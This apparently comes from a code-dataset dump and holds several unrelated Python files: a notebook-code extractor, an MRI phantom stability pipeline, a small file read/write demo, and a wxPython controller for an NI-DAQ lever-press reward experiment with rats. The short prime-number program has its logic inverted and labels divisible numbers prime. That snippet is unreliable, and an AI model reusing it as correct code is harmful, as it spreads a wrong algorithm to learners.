追加したpassを除去\n\n # sec: 計算式をコメントアウト\n\n re_noco = re.compile(r\"^(\\s\\t)*$|^(\\s\\t)*#\")\n for i_from, i_to in expr_list:\n\n for i in range(i_from, i_to + 1):\n if not re_noco.search(lines[i]): # if: コードあり\n lines[i] = \"# EXPR: \" + lines[i]\n\n return \"\\n\".join(lines)\n\ndef test__get_code_from_ipynb():\n # 結果:\n # \n # # ---------- cell ----------\n # \n # # NOT-PY: %matplotlib inline\n # \n # # ---------- cell ----------\n # \n # # NOT-PY: !pip show pip\n # \n # # ---------- cell ----------\n # \n # # import gym\n # import math\n # ...(以降略)\n\n PATH_NB = \"./official-tut reinforcement_q_learning.ipynb\"\n text_code = get_code_from_ipynb(PATH_NB)\n print(text_code)\n# main = test__get_code_from_ipynb\n\n# AST Nodeから行番号を取得\ndef get_lineno(node):\n\n try:\n return node.lineno - 1 # 開始番号は1からの為\n except:\n return None\n\n# sec: entry\n\nif __name__ == \"__main__\": main()\n","sub_path":"GraduationWork/v1/ipynb_import_lib.py","file_name":"ipynb_import_lib.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"326623646","text":"#Write a program to find the prime or not.\n\nn=int(input(\"enter the number:\"))\nif n>1:\n for i in range(2,n):\n if (n%i)==0:\n print(n, \"is the prime number\")\n print(i, \"times\", n // i, \"is\", n)\n break\n else:\n print(n,\"is not the prime number\")\n","sub_path":"primenum.py","file_name":"primenum.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"21814486","text":"#!/usr/bin/env python\n\n\"\"\"processstability.py: convert dicoms, run stabilitycalc and stabilitysummary\"\"\"\n\nfrom os.path import join as pjoin\nimport os\nfrom glob import glob\nimport re\nimport logging\nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n\nfrom stabilityfuncs import stabilityparms, dict_from_tsvfile\nfrom dicom2nifti import dicom2nifti\nfrom stabilitycalc import stabilitycalc\nfrom stabilitysummary import stabilitysummary\n\nrawdicomdir = stabilityparms('rawdicomdir')\nsorteddicomdir = stabilityparms('sorteddicomdir')\nprocessedscandir = stabilityparms('processedscandir')\noutputdir = stabilityparms('outputdir')\n\nscantypes = {'epi_bold': 'ep2d_bold_normalize_*',\n 'epi_multiflip10': 'ep2d_multiflip_10_*',\n 'epi_multiflip77': 'ep2d_multiflip_77_*',\n 'epi_pace': 'ep2d_pace_normalize_*',\n 'epi_singleslice': 'epi_stability_single*sPlot*'}\n\n\ndef processstability(session, dicom=True, summ=True, recalc=True):\n \"\"\"main\"\"\"\n\n def name(pattern):\n n = [x for x in glob(pjoin(sorteddicomdir, session, pattern)) if 'adaptive' not in x]\n if not n:\n return ''\n else:\n return n[0]\n\n for scantype, pattern in scantypes.items():\n scan = name(pattern)\n if scan:\n logging.debug('processstability: {}, {}'.format(scantype, scan))\n if recalc:\n _dicom_to_stabilitycalc(dicomseries=scan, niftiname=scantype, dicom=dicom)\n\n if scantype == 'epi_pace':\n analsum = dict_from_tsvfile(pjoin(processedscandir, session, scantype, 'procresults', 'analysissummary.txt'))\n\n for unc in glob(pjoin(sorteddicomdir, session, 'uncombined*')):\n bunc = os.path.basename(unc)\n m = re.search(r'uncombined(H\\d+)_', bunc)\n try:\n ele = m.group(1)\n except AttributeError:\n ele = bunc\n\n ele = 'element_' + ele\n\n logging.debug('processstability: PACE: doing scan={}, unc={}, ele={}'.format(scan, bunc, ele))\n if recalc:\n _dicom_to_stabilitycalc(dicomseries=bunc, niftiname=ele, dicom=dicom, starttime=0,\n initxcenter=analsum['center_of_mass_x'],\n initycenter=analsum['center_of_mass_y'],\n initzcenter=analsum['center_of_mass_z'])\n\n if summ:\n stabilitysummary(processedscandir, pjoin(outputdir, '3T', 'birn'), scantype, TargetisBIRNphantom=True)\n\n if scantype != 'epi_pace':\n stabilitysummary(processedscandir, pjoin(outputdir, '3T', 'nonbirn'), scantype, TargetisBIRNphantom=False)\n\n logging.info('processstability done.')\n\ndef _dicom_to_stabilitycalc(dicomseries, niftiname, dicom=True, starttime=10, initxcenter=None, initycenter=None, initzcenter=None):\n\n if dicom:\n dicom2nifti(pjoin(sorteddicomdir, session, dicomseries),\n pjoin(processedscandir, session), niftiname)\n\n stabilitycalc(pjoin(processedscandir, session, niftiname), niftiname + '.nii.gz', starttime, initxcenter, initycenter, initzcenter)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Convert DICOMs, run stability{calc,summary}.')\n parser.add_argument('session', help='The session to work on, relative to SORTEDDICOMDIR or PROCESSEDSCANDIR.')\n parser.add_argument('--nodicom', help='Do not reprocess DICOM files; assume they are already done.', action='store_true')\n parser.add_argument('--norecalc', help='Do not reprocess stability; assume it is already done. (Just do summary.)', action='store_true')\n parser.add_argument('--nosumm', help='Do not reprocess summaries.', action='store_true')\n args = parser.parse_args()\n\n session = args.session\n\n processstability(session, not args.nodicom, not args.nosumm, not args.norecalc)\n","sub_path":"processstability.py","file_name":"processstability.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"466266297","text":"f = open('C:/work/pyzen.txt','wt')\nf.write('at 모드 테스트\\n')\nf.write('추가: 아름다운이 추한 것보다 낫다.\\n')\nf.write('추가: 명시적인 것이 암묵적인 것보다 낫다. \\n')\nf.close()\n\nf = open('C:/work/pyzen.txt',mode='r')\ns = f.read()\nprint(s) \nf.close()","sub_path":"writereadfile.py","file_name":"writereadfile.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"627923222","text":"'''\nPyView Version 1.0\n\nThis program handles the Digital Input and Output he National Instruments DAQmx USB-6509 device.\nThis could be used to run reward based experiments to train rats and to record the neural activity\nin their gustatory cortex.\n\nLast Updated: August 9, 2011\n\nWritten By: Anupam Gogar [anupamgogar@gmail.com]\nAppended By: Alice Q. Wong [ariqing@gmail.com]\n\n'''\n\nDEVICE_ON = False\n\n'''\nImporting libnidaqmx, the library that interacts with the National Instrument's dll\nand provides the functionality in python. DigitalInputTask and DigitalOutputTask are\nclasses defined in python that activate the input and output tasks.\n'''\n\nif DEVICE_ON:\n from libnidaqmx import System\n from libnidaqmx import Device\n from libnidaqmx import DigitalOutputTask\n from libnidaqmx import DigitalInputTask\n\n'''\n\nImporting functional libraries for getting time, string manipulation, random number\ngeneration, and multi-threading. 'wx' is for designing the graphical user interface\nand numpy is for various numerical calculations.\n\n'''\n\n#native w/ python\nfrom threading import Thread\nimport threading\nimport time\nimport string\nimport random\nfrom datetime import datetime\nimport os\n\n#for gui\nimport wx\n\n#for charts\nimport numpy\nimport matplotlib\nmatplotlib.use('WXAgg')\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import _load_bitmap\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport pylab\n\n'''\nGlobal Variables\n'''\nif DEVICE_ON:\n system = System()\n dev = system.devices[0]\n\n# all the calls to time.clock() funtion in the program would-\n# -return the time elapsed since the call to this function\n\nrandom.seed()\n\nframeName = \"NI-DAQ \"\nif DEVICE_ON:\n frameName += dev.get_product_type()\n \n\n'''\nDeliveryThread Class inherited from Thread class. It takes care of all the\ndeliveries in the experiment, for example taste delivery and tone delivery.\n\nFour parameters are passed to the constructor namely-\n\n1.) nP, number of pulses\n2.) pI, pulse interval\n3.) rD, reward duration\n4.) mode, 1 stands for Taste Mode and 2 stands for Tone Mode\n\nIn usual scenario, number of pulses would be set to 1 and pulse interval\nwould be set to 0, as we only intend to send one pulse while doing a\nmanual taste or while giving a reward.\n\n'''\n\nclass DeliveryThread (Thread):\n def __init__( self, nP, pI, rD, mode):\n Thread.__init__(self)\n\n # making the parameters passed as local variable for this class\n \n self.np = nP\n self.pi = pI\n self.rd = rD\n self.m = mode\n\n self.stop_flag = False\n self.start()\n\n \n def run(self):\n if Frame.Panel1.numValves == 0:\n Frame.Panel1.logger.AppendText(\"\\nError: no valve selected.\\n\")\n Frame.Panel1.deliverButton.Enable()\n return\n else:\n if self.m == 1:\n randValIndex = random.randint(0,Frame.Panel1.numValves - 1)\n choosenValve = Frame.Panel1.openValves[randValIndex]\n Frame.Panel1.channelInUse = Frame.Panel1.channels[choosenValve]\n Frame.Panel1.channelNeuralynx = Frame.Panel1.channels[choosenValve+9]\n elif self.m == 2:\n Frame.Panel1.channelInUse = Frame.Panel1.channels[8] #sends to speaker control\n Frame.Panel1.channelNeuralynx = Frame.Panel1.channels[17] #sends to Neuralynx recorder\n \n if DEVICE_ON:\n taskO_Neuralynx = DigitalOutputTask()\n taskO_Neuralynx.create_channel(Frame.Panel1.channelNeuralynx)\n \n taskO = DigitalOutputTask()\n taskO.create_channel(Frame.Panel1.channelInUse)\n \n taskO_Neuralynx.start()\n taskO.start()\n taskO.write(1) # pulse delivered\n \n taskO_Neuralynx.write(1)\n taskO_Neuralynx.write(0)\n \n time.sleep(self.rd) #wait for reward duration\n taskO.write(0) # pulse delivery stopped\n \n taskO.stop()\n taskO.clear()\n \n taskO_Neuralynx.stop()\n taskO_Neuralynx.clear()\n\n else:\n time.sleep(self.rd)\n \n self.stop()\n Frame.Panel1.deliverButton.Enable()\n\n def stop(self):\n self.stop_flag = True # stop_flag not required here, because no Stop Button\n if self.m==2:\n Frame.Panel1.tonePlayed=True\n Frame.Panel1.tToneAt = time.clock()\n if self.m==1:\n Frame.Panel1.tRewardAt = time.clock()\n\nclass MainThread(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.stop_flag = False\n self.giveReward = False\n self.redraw_flag = False\n self.start()\n \n def sendTone(self,tn):\n Frame.Panel1.OnDeliver(None, 1, 0, self.tD, 2)\n Frame.Panel1.timeStamps.append( ('Tone Delivery ',tn) )\n Frame.Panel1.logger.AppendText('\\n\\n%s Tone \\n\\n'% round(tn,2) )\n \n def sendReward(self,tn,tt):\n Frame.Panel1.OnDeliver(None, 1, 0, self.rD, 1)\n Frame.Panel1.timeStamps.append( ('Taste Delivery ',tn) )\n Frame.Panel1.logger.AppendText('\\n\\n%s Taste \\n\\n' % round(tn,2))\n Frame.Panel1.tonePlayed = False\n if Frame.Panel1.deliverManualTaste == 1:\n Frame.Panel2.addPoint(tn-tt+Frame.Panel1.rewardDuration,2)\n Frame.Panel1.numberOfMT+=1\n Frame.Panel1.wManTaste.SetLabel(str(Frame.Panel1.numberOfMT))\n else:\n Frame.Panel2.addPoint(tn-tt+Frame.Panel1.rewardDuration,1)\n Frame.Panel1.numberOfRewards += 1\n Frame.Panel1.wNumRewards.SetLabel(str(Frame.Panel1.numberOfRewards))\n Frame.Panel1.wTimeTone.SetLabel('0.0')\n Frame.Panel1.rewarded = True\n self.redraw_flag = True\n\n def pressedLever(self,tn,tt):\n Frame.Panel1.timeStamps.append( ('Lever Press ',tn) )\n Frame.Panel1.logger.AppendText('%s \\n' % round(tn,2))\n Frame.Panel2.addPoint(tn-tt,0)\n self.redraw_flag = True\n\n def threadAvailable(self):\n if Frame.Panel1.deliveryT!=None:\n if Frame.Panel1.deliveryT.isAlive():\n return False\n else:\n return True\n else:\n return True\n\n\n def run(self):\n \n if DEVICE_ON:\n taskI = DigitalInputTask()\n taskI.create_channel('Dev1/Port0/Line0')\n \n Frame.Panel1.channelNeuralynx2 = Frame.Panel1.channels[18]\n \n taskO_Neuralynx2 = DigitalOutputTask()\n taskO_Neuralynx2.create_channel(Frame.Panel1.channelNeuralynx2)\n \n taskI.start()\n \n t0 = time.clock()\n Frame.Panel1.tRewardAt = t0\n Frame.Panel1.tToneAt = t0\n Frame.Panel1.tonePlayed = False\n Frame.Panel1.rewarded = False\n \n dispExpPastTime = 0.00\n dispTonePastTime = 0.00\n Frame.Panel1.logger.AppendText('\\nExperiment Begins .. Duration: %s seconds\\n' % Frame.Panel1.experimentDuration)\n\n #rD - reward Duration (s), tD - tone Duration (s)\n self.rD = Frame.Panel1.rewardDuration\n self.tD = Frame.Panel1.toneDuration\n\n if DEVICE_ON:\n taskO_Neuralynx2.start()\n #have not exceeded experiment duration\n tCurr = time.clock()\n while (tCurr-t0) < Frame.Panel1.experimentDuration:\n if Frame.Panel1.rewarded:\n Frame.Panel1.tRewardAt = time.clock()\n Frame.Panel1.rewarded = False \n if round(tCurr-t0,2)!=dispExpPastTime:\n dispExpPastTime = round(tCurr-t0,2)\n Frame.Panel1.wExperimentTime.SetLabel(str(dispExpPastTime))\n \n #terminate loop if stop is called\n if self.stop_flag:\n break\n #read from channels\n if DEVICE_ON:\n (data,abc) = taskI.read(samples_per_channel = 1, timeout = -1, fill_mode = 'group_by_channel')\n \n tCurr=time.clock()\n #Test time to play tone?\n if (tCurr - Frame.Panel1.tRewardAt) >= Frame.Panel1.iti:\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n if not(Frame.Panel1.tonePlayed) and self.threadAvailable():\n self.sendTone(tCurr)\n else:\n if round(tCurr-Frame.Panel1.tToneAt,2)!=dispTonePastTime:\n dispTonePastTime = round(tCurr-Frame.Panel1.tToneAt,2)\n Frame.Panel1.wTimeTone.SetLabel( str(dispTonePastTime) )\n\n # Lever Pressed\n if DEVICE_ON:\n lvpressed = (data[0][0] == 1)\n else:\n lvpressed = Frame.Panel1.pseudoPress\n if lvpressed:\n #print \"Lever pressed\"\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n \n tCurr = time.clock()\n minTime = tCurr>(Frame.Panel1.tToneAt+Frame.Panel1.wait)\n maxTime = tCurr<(Frame.Panel1.tToneAt+Frame.Panel1.wait+Frame.Panel1.rewardInterval)\n if Frame.Panel1.tonePlayed and minTime and maxTime:\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n self.sendReward(tCurr,Frame.Panel1.tRewardAt)\n else:\n self.pressedLever(tCurr,Frame.Panel1.tRewardAt)\n \n Frame.Panel1.pseudoPress = False\n\n #lever not pressed\n if DEVICE_ON:\n lvNotPressed = data[0][0] == 0\n else:\n lvNotPressed = not(lvpressed)\n \n if lvNotPressed:\n if DEVICE_ON:\n taskO_Neuralynx2.write(1)\n taskO_Neuralynx2.write(0)\n tCurr = time.clock()\n if Frame.Panel1.deliverManualTaste == 1:\n self.sendReward(tCurr,Frame.Panel1.tRewardAt)\n Frame.Panel1.deliverManualTaste = 0\n tCurr = time.clock()\n if self.redraw_flag:\n Frame.Panel2.Refresh()\n self.redraw_flag = False\n \n# write to file after the experiment has ended \n if self.stop_flag == False:\n writeToFile()\n Frame.Panel1.logger.AppendText('\\nEnd of experiment.\\n')\n \n if DEVICE_ON:\n taskO_Neuralynx2.stop()\n taskO_Neuralynx2.clear()\n \n taskI.stop()\n taskI.clear()\n \n Frame.Panel1.startButton.Enable()\n\n def stop(self):\n self.stop_flag = True\n \n\nclass GraphPanel(wx.Panel):\n def __init__(self,parent,ctrl):\n wx.Panel.__init__(self,parent)\n self.SetBackgroundColour('#FFFFFF')\n self.ctrlPanel = ctrl\n self.initGraph()\n wx.EVT_PAINT(self, self.OnPaint)\n\n\n def initGraph(self):\n self.x0 = []\n self.y0 = []\n self.x1 = []\n self.y1 = []\n self.x2 = []\n self.y2 = []\n self.trial = 1\n \n self.figure = Figure(dpi=100,figsize=(5,8))\n self.axes = self.figure.add_subplot(111)\n self.axes.axis([0,self.ctrlPanel.experimentDuration,1,0])\n self.axes.set_xlabel('time (s)')\n\n bluepts = self.axes.scatter(self.x0, self.y0, c='b',s=10,lw=0.0)\n redpts = self.axes.scatter(self.x1,self.y1, c='r',s=10,lw=0.0)\n purpts = self.axes.scatter(self.x2,self.y2,c='m',s=10,lw=0.0)\n\n startAt = self.ctrlPanel.iti\n endAt = startAt+self.ctrlPanel.toneDuration\n tone = self.axes.axvspan(startAt,endAt,facecolor='g',alpha=0.5,lw=0.0)\n startAt = endAt\n endAt = startAt+self.ctrlPanel.wait\n wait = self.axes.axvspan(startAt,endAt,facecolor='#aeaeae',alpha=0.5,lw=0.0)\n startAt = endAt\n endAt = startAt + self.ctrlPanel.rewardInterval\n reward = self.axes.axvspan(startAt,endAt,facecolor='#FFCCCC',alpha=0.5,lw=0.0)\n\n LText = FontProperties()\n LText.set_size(\"small\")\n \n self.axes.legend((bluepts,redpts,purpts,tone,wait,reward),\n (\"Lever Press\",\"Rewarded Press\",\"Manual Reward\",\"Tone Duration\",\"Wait Interval\",\"Reward Interval\"),\n prop=LText, fancybox=True, bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=2, mode=\"expand\", borderaxespad=0)\n\n self.canvas = FigureCanvas(self, -1, self.figure)\n \n def clearGraph(self):\n self.figure.delaxes(self.axes)\n self.initGraph()\n self.Refresh()\n \n def addPoint(self,t,pcat):\n if pcat==1:\n self.x1.append(t)\n self.y1.append(self.trial)\n self.trial+=1\n self.axes.set_ylim(bottom=self.trial)\n elif pcat==2:\n self.x2.append(t)\n self.y2.append(self.trial)\n self.trial+=1\n self.axes.set_ylim(bottom=self.trial)\n else:\n self.x0.append(t)\n self.y0.append(self.trial)\n \n \n def OnPaint(self, event):\n\n self.bluepts = self.axes.scatter(self.x0, self.y0, c='b',s=10,lw=0.0)\n self.redpts = self.axes.scatter(self.x1,self.y1, c='r',s=10,lw=0.0)\n self.purpts = self.axes.scatter(self.x2,self.y2,c='m',s=10,lw=0.0)\n self.canvas.draw()\n event.Skip()\n\n def OnSetFocus(self, event):\n #self.color = '#0099f7'\n self.color = 'yellow'\n self.Refresh()\n\n def OnKillFocus(self, event):\n self.color = '#b3b3b3'\n self.Refresh()\n\n\nclass MainPanel(wx.Panel):\n \n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n self.quote = wx.StaticText(self, label=\"MAIN PANEL\", pos=(200, 10))\n self.deliveryT = None\n # A multiline TextCtrl - This is here to show how the events work in this program, don't pay too much attention to it\n self.timeStamps = []\n self.numberOfRewards = 0\n self.numberOfMT = 0\n self.deliverManualTaste = 0\n self.valveArray = numpy.zeros ( 8, int )\n self.numValves = 0\n self.openValves = []\n self.pseudoPress = False\n # 19 channels\n '''Channel Menu [Valve1, Valve2, Valve3, Valve4,\n Valve5, Valve6, Valve7, Valve8,\n Tone1, Neuralynx Pair 1, Neuralynx Pair 2, Neuralynx Pair 3,\n Neuralynx Pair 4, Neuralynx Pair 5, Neuralynx Pair 6, Neuralynx Pair 7,\n Neuralynx Pair 8, Neuralynx Pair 9, Neuralynx Pair 10]'''\n self.channels = ['Dev1/Port5/Line5', 'Dev1/Port2/Line7', 'Dev1/Port5/Line7', 'Dev1/Port5/Line4',\n 'Dev1/Port2/Line4', 'Dev1/Port2/Line5', 'Dev1/Port5/Line6', 'Dev1/Port2/Line6',\n 'Dev1/Port11/Line7', 'Dev1/Port4/Line7','Dev1/Port4/Line6','Dev1/Port4/Line5',\n 'Dev1/Port4/Line4','Dev1/Port4/Line3','Dev1/Port4/Line2','Dev1/Port4/Line1',\n 'Dev1/Port4/Line0','Dev1/Port3/Line7','Dev1/Port3/Line6'] \n self.tonePlayed = False\n self.timeSinceTone = 0\n self.expTime = 0\n \n # Default valutes\n self.numberPulses = 1\n self.pulseInterval = 0\n self.pulseDuration = 100\n self.experimentDuration = 60\n self.rewardInterval = 5.0\n self.rewardDuration = 0.043\n self.iti = 2\n self.wait = 0\n self.toneDuration = 1\n\n self.channelInUse = ''\n \n self.logger = wx.TextCtrl(self, pos=(20,400), size=(400,200), style=wx.TE_MULTILINE | wx.TE_READONLY) \n\n def OnToggleValve(event):\n obj = event.GetEventObject()\n objId = obj.GetId()\n n = objId - 1\n if self.valveArray[n] == 1:\n self.valveArray[n] = 0\n self.numValves -= 1\n self.openValves.remove(n)\n else:\n self.valveArray[n] = 1\n self.numValves += 1\n self.openValves.append(n)\n\n valve1 = wx.ToggleButton(self, 1, 'Valve 1', (20, 25))\n valve2 = wx.ToggleButton(self, 2, 'Valve 2', (20, 55))\n valve3 = wx.ToggleButton(self, 3, 'Valve 3', (20, 85))\n valve4 = wx.ToggleButton(self, 4, 'Valve 4', (20, 115))\n\n valve5 = wx.ToggleButton(self, 5, 'Valve 5', (110, 25))\n valve6 = wx.ToggleButton(self, 6, 'Valve 6', (110, 55))\n valve7 = wx.ToggleButton(self, 7, 'Valve 7', (110, 85))\n valve8 = wx.ToggleButton(self, 8, 'Valve 8', (110, 115))\n\n valve1.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve2.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve3.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve4.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve5.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve6.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve7.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n valve8.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n\n self.deliverButton = wx.Button(self, label=\"Manual Taste\", pos = (60, 300) )\n\n def helperDeliver(evt):\n self.deliverManualTaste = 1\n nP = self.numberPulses\n pI = self.pulseInterval\n rD = self.pulseDuration / 1000.0\n #self.OnDeliver(evt, nP, pI, rD, 1)\n \n self.Bind(wx.EVT_BUTTON, helperDeliver, self.deliverButton)\n\n self.pseudoLever = wx.Button(self,label=\"Lever Press\",pos=(60,270))\n def OnPseudoLeverPress(event):\n self.pseudoPress = True\n self.Bind(wx.EVT_BUTTON, OnPseudoLeverPress, self.pseudoLever)\n\n self.startButton = wx.Button(self, label = \"Start\", pos = (260,300) )\n self.Bind (wx.EVT_BUTTON, self.OnStart, self.startButton)\n\n self.stopButton = wx.Button(self, label = \"Stop\", pos = (260,360) )\n self.Bind (wx.EVT_BUTTON, self.OnStop, self.stopButton)\n \n self.resetButton = wx.Button(self,label=\"Reset Counter\", pos=(300,710))\n self.Bind(wx.EVT_BUTTON, self.OnResetCounter, self.resetButton)\n\n \n # Text input\n\n self.rDuration = wx.StaticText(self, label=\"Pulse Duration (ms): \",pos=(20,340))\n self.wDuration = wx.TextCtrl(self, value=str(self.pulseDuration), pos=(115, 336), size=(40,-1))\n self.Bind(wx.EVT_TEXT, self.evtDuration, self.wDuration)\n \n self.rExperimentDur = wx.StaticText(self, label=\"Experiment Duration (s): \",pos=(220,130))\n self.wExperimentDur = wx.TextCtrl(self, value=str(self.experimentDuration), pos=(345, 130), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtExperimentDur, self.wExperimentDur)\n \n self.rRewardInt = wx.StaticText(self, label=\"Reward Interval (s): \",pos=(220,160))\n self.wRewardInt = wx.TextCtrl(self, value=str(self.rewardInterval), pos=(345, 160), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtRewardInt, self.wRewardInt)\n\n self.rRewardDur = wx.StaticText(self, label=\"Reward Duration (s): \",pos=(220,190))\n self.wRewardDur = wx.TextCtrl(self, value=str(self.rewardDuration), pos=(345, 190), size=(45,-1))\n self.Bind(wx.EVT_TEXT, self.evtRewardDur, self.wRewardDur)\n\n self.rITI = wx.StaticText(self, label =\" Inter Trial Interval (s):\", pos=(220,50))\n self.wITI = wx.TextCtrl(self, value =str(self.iti), pos=(365, 45), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtITI, self.wITI)\n\n self.rWait = wx.StaticText(self, label=\" Wait Interval (s):\", pos=(220,100))\n self.wWait = wx.TextCtrl(self, value=str(self.wait), pos=(365,95), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtWait, self.wWait)\n\n self.rToneDur = wx.StaticText(self, label=\" Tone Duration (s):\", pos=(20,160))\n self.wToneDur = wx.TextCtrl(self, value=str(self.toneDuration), pos=(120, 155), size=(40,-1))\n self.Bind(wx.EVT_TEXT, self.evtToneDur, self.wToneDur)\n\n self.rExperimentTime = wx.StaticText(self, label=\" Experiment Time \", pos=(50,650))\n self.wExperimentTime = wx.StaticText(self, label=\"0\", pos=(160, 648))\n\n self.rNumRewards = wx.StaticText(self, label=\" # of Rewards \", pos=(300,650))\n self.wNumRewards = wx.StaticText(self, label=\"0\", pos=(400, 650))\n\n self.rManTaste = wx.StaticText(self,label=\" # of Manual Tastes \", pos=(300,680))\n self.wManTaste = wx.StaticText(self, label=\"0\", pos=(400, 680))\n\n self.rTimeTone = wx.StaticText(self, label=\" Time from Tone \", pos=(50,710))\n self.wTimeTone = wx.StaticText(self, label=\"0\", pos=(160, 708)) \n\n self.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)\n self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)\n\n def setSibling(self,graph):\n self.graphPanel = graph\n \n def OnDeliver(self,event, nP, pI, rD, mode):\n self.deliverButton.Disable()\n self.deliveryT = DeliveryThread(nP,pI,rD, mode)\n\n def OnResetCounter(self,evt):\n self.wNumRewards.SetLabel(\"0\")\n self.numberOfRewards=0\n self.wManTaste.SetLabel(\"0\")\n self.numberOfMT=0\n \n \n# IMP Note: Digital Inputs are normally pulled high\n# IMP Note: 'Normal Close' for Lever Input\n\n def OnStop(self, event):\n self.worker.stop()\n self.startButton.Enable()\n writeToFile()\n\n def OnStart(self, event):\n #if len(self.timeStamps)>0:\n # clearGraph()\n # self.timeStamps = []\n clearGraph()\n if Frame.Panel1.numValves == 0:\n Frame.Panel1.logger.AppendText(\"Error: no valve selected.\\n\")\n return\n self.worker = MainThread()\n #Disable any widgets which could affect your thread\n self.startButton.Disable()\n \n def evtDuration(self, event):\n try:\n self.pulseDuration = int(event.GetString())\n except ValueError:\n pass\n \n def evtWait(self, event):\n try:\n self.wait = float(event.GetString())\n except ValueError:\n pass\n\n def evtExperimentDur(self, event):\n try:\n self.experimentDuration = float(event.GetString())\n except ValueError:\n pass\n\n def evtRewardInt(self, event):\n try:\n self.rewardInterval = float(event.GetString())\n except ValueError:\n pass\n\n def evtRewardDur(self, event):\n try:\n self.rewardDuration = float(event.GetString())\n except ValueError:\n pass\n\n def evtITI(self, event):\n try:\n self.iti = float(event.GetString())\n except ValueError:\n pass\n\n def evtToneDur(self, event):\n try:\n self.toneDuration= float(event.GetString())\n except ValueError:\n pass\n\n def OnSetFocus(self, event):\n self.color = '#0099f7'\n self.Refresh()\n\n def OnKillFocus(self, event):\n self.color = '#b3b3b3'\n self.Refresh()\n\nclass MyFrame(wx.Frame):\n def __init__(self, parent, id, title):\n wx.Frame.__init__(self, parent, id, title, size=(1000, 800))\n grid = wx.GridSizer(1, 2, 10, 10)\n self.Panel1 = MainPanel(self)\n self.Panel2 = GraphPanel(self,self.Panel1)\n self.Panel1.setSibling(self.Panel2)\n grid.AddMany([(self.Panel1, 1, wx.EXPAND|wx.TOP|wx.LEFT,9), (self.Panel2, 1, wx.EXPAND|wx.TOP|wx.RIGHT, 9)])\n\n self.SetSizer(grid)\n self.Centre()\n self.Show(True)\n\ndef plotGraph(event):\n Frame.Panel2.OnPaint(event)\n\ndef clearGraph():\n Frame.Panel2.clearGraph()\n \n#def test():\n\n \ndef writeToFile():\n \n currDir = os.getcwd()\n dirs = currDir.split('\\\\')\n dirs.pop()\n currDir = '\\\\'.join(dirs)\n directory = currDir+'\\\\Time Stamps\\\\'\n fileName = directory + datetime.now().strftime(\"%Y.%B.%d, %H.%M.%S\") + '.txt'\n f = open(fileName, 'w')\n temp = Frame.Panel1.timeStamps\n for i in range( len(temp) ):\n tempString = str(temp[i][1])+ '\\t' + str(temp[i][0]) + '\\n'\n f.write(tempString)\n f.close()\n directory = currDir+'\\\\ExpParams\\\\'\n fileName = directory + datetime.now().strftime(\"%Y.%B.%d, %H.%M.%S\") + '.txt'\n f = open(fileName,'w')\n f.write(\"Experiment Duration = \\t\"+str(Frame.Panel1.experimentDuration)+\"\\n\\n\")\n f.write(\"Inter Trial Interval = \\t\"+str(Frame.Panel1.iti)+\"\\n\")\n f.write(\"Wait Interval = \\t\"+str(Frame.Panel1.wait)+\"\\n\")\n f.write(\"Reward Interval = \\t\"+str(Frame.Panel1.rewardInterval)+\"\\n\")\n f.write(\"Reward Duration = \\t\"+str(Frame.Panel1.rewardDuration)+\"\\n\")\n f.write(\"Rewarded Lever Presses = \\t\"+str(Frame.Panel1.numberOfRewards)+\"\\n\")\n f.close()\n Frame.Panel1.logger.AppendText(\"Writing to File Completed.\\n\")\n Frame.Panel1.timeStamps = []\n \napp = wx.App(False) # Create a new app, don't redirect stdout/stderr to a window. \nFrame = MyFrame(None, -1, frameName)\napp.MainLoop()\n\n\n\n\n","sub_path":"ExpSuite - Copy/ExpSuite/TMP/historic_files/LeverPress_AWv1.3.py","file_name":"LeverPress_AWv1.3.py","file_ext":"py","file_size_in_byte":25038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"503988036","text":"from typing import Any, Mapping, Optional\r\nimport argparse\r\nimport pickle\r\nimport json\r\nimport pathlib\r\nimport os\r\n\r\nimport torchvision\r\nimport soundfile\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nimport torch\r\nimport torch.distributed as dist\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader, DistributedSampler\r\nfrom torch.nn.parallel import DistributedDataParallel as DDP\r\nimport lmdb\r\nfrom tqdm import tqdm\r\n\r\nfrom pytorch_nsynth import NSynth\r\nfrom GANsynth_pytorch.loader import (WavToSpectrogramDataLoader,\r\n 